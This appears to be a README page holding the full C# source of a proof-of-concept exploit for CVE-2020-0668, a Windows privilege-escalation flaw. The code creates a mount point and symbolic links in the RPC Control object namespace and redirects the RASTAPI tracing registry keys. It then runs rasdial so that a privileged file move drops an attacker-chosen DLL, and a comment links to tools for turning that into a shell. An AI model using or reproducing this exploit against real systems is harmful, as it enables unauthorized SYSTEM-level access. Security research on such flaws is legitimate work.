README.md
Rendering markdown...
using NtApiDotNet;
using System;
using System.Threading;
using System.IO;
using Microsoft.Win32;
using System.Diagnostics;
//TODO actually get shells using https://github.com/itm4n/UsoDllLoader OR https://github.com/xct/diaghub
namespace CVE_2020_0668
{
class Program
{
static void Main(string[] args)
{
if (args.Length != 2)
{
Console.WriteLine("Use CVE-2020-0668 to perform an arbitrary privileged file move operation.");
Console.WriteLine($"Usage: inFilePath outFilePath");
return;
}
String inDLLPath = args[0];
String outDllPath = args[1];
if (!File.Exists(inDLLPath))
{
Console.WriteLine($@"[!] Cannot find {inDLLPath}!");
return;
}
Console.WriteLine(String.Format("[+] Moving {0} to {1}", inDLLPath, outDllPath));
String tempDirectory = GetTemporaryDirectory();
const string ObjectDirectory = @"\RPC Control";
Console.WriteLine($@"[+] Mounting {ObjectDirectory} onto {tempDirectory}");
string tempDirectoryNt = NtFileUtils.DosFileNameToNt(tempDirectory);
NtFile.CreateMountPoint(tempDirectoryNt, ObjectDirectory, "");
Console.WriteLine("[+] Creating symbol links");
var logFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.LOG", $@"\??\{inDLLPath}");
var oldFileSymlnk = NtSymbolicLink.Create($@"{ObjectDirectory}\RASTAPI.OLD", $@"\??\{outDllPath}");
Console.WriteLine(@"[+] Updating the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\RASPLAP configuration.");
Console.WriteLine(@"[+] Sleeping for 5 seconds so the changes take effect");
UpdateRASTAPITracingConfig(tempDirectory, true, 0x1000);
Thread.Sleep(5000); // might have to sleep for the update to take effect
string phonebookPath = Path.Combine(Path.GetTempPath(), Guid.NewGuid().ToString() + ".pbk");
Console.WriteLine($"[+] Writing phonebook file to {phonebookPath}");
File.WriteAllText(phonebookPath, CVE_2020_0668.Properties.Resources.Phonebook);
using (Process p = new Process())
{
p.StartInfo.FileName = "rasdial";
p.StartInfo.Arguments = $@"VPNTEST test test /PHONEBOOK:{phonebookPath}";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.Start();
p.WaitForExit();
}
Console.WriteLine("[+] Cleaning up");
File.Delete(phonebookPath);
Directory.Delete(tempDirectory, true);
logFileSymlnk.Close();
oldFileSymlnk.Close();
UpdateRASTAPITracingConfig(@"%windir%\tracing", false, 0x100000); //those are the default values
Console.WriteLine("[+] Done!");
}
static public void UpdateRASTAPITracingConfig(string logDirectory, bool enabled, int logSize)
{
using (RegistryKey HKLocalMachine = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, RegistryView.Registry64))
{
using (RegistryKey key = HKLocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Tracing\RASTAPI", true))
{
if (key != null)
{
key.SetValue(@"FileDirectory", logDirectory);
key.SetValue(@"MaxFileSize", logSize);
key.SetValue(@"EnableFileTracing", enabled ? 1 : 0);
}
else
{
Console.WriteLine(@"[!] Failed to open HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI with write access!");
System.Environment.Exit(1);
}
}
}
}
static public string GetTemporaryDirectory()
{
string tempDirectory = Path.Combine(Path.GetTempPath(), Path.GetRandomFileName());
Directory.CreateDirectory(tempDirectory);
return tempDirectory;
}
}
}